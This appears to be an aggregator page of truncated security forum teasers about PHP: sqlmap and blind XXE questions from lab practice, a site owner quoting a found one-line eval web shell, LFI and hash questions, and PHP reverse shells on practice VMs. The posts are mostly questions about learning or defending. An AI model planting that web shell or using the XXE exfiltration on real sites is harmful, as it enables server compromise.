Collaborate Disseminate
I am working on Hack the VM (hard machine) for my OSCP preparation
There is a web app with two drop down boxes.. Year and month.. both contain numbers and a submit to fetch data from DB based on year and month
Now when I change the month v… Continue reading Sqlmap not detects error based injection
When attempting to exploit blind XXE as explained in this article, I got an error in my apache logs:
PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity
The DTD file:
<!ENTITY % payload SYSTEM &q… Continue reading PHP Blind XXE Exploitation: Invalid URI in Entity
I have found three files with name as below:
a.phpfile.txt
b.phpfile.txt
c.phpfile.txt
when i open, each file contained with the following code:
<?php @eval($_POST[x]);
I have deleted all the pages from my website, but i am ne… Continue reading .php code in .txt file with eval() function [duplicate]
Today I learned that Microsoft “has been providing support for the development and building of the PHP programming language on Windows,” according to Bleeping Computer. “This support includes developing security patches for PHP and creating native Wind… Continue reading Microsoft Announces It Won’t Be the Ones Building PHP 8.0 for Windows
phpseclib has been around for some time now. I just started toying with it and I am definitely interested in using this for a project. That said, I am not able to find much information on how professionals feel about the library versus oth… Continue reading PHPSECLIB in 2020
How can i set a custom header using javascript or php? I am trying to add a custom header to my html form but i’m new to programming so i’m still learning.
I’d like to add a custom header to my form and my current form code is this one:
&l… Continue reading how can i set a custom header with javascript or php?
In June, 1995, Rasmus Lerdorf made an announcement on a Usenet group. You can still read it.
Announcing the Personal Home Page Tools (PHP Tools) version 1.0.
These tools are a set of small tight cgi binaries written in C.
Today, twenty five years on, PHP is about as ubiquitous …read more
Continue reading Does PHP Have A Future, Or Are Twenty Five Years Enough?
I am working on a project which requires the name of the page as a query parameter ‘path’. The app stores path variable as res.query.path. My manager asked me to pay attention to LFI, so I’m concerned about it. The app is using Express.JS,… Continue reading Local file inclusion in JS app [closed]
A fellow developer and I have been having a discussion about how vulnerable a few different methods of developing a hash are, and I’ve come here to see if smarter people than I (us?) can shed some light.
In PHP, I feel the below is secure … Continue reading Is this method of 32 char hash generation secure enough for online-based attacks?
I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.
For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I… Continue reading Help Understanding PHP Reverse Shells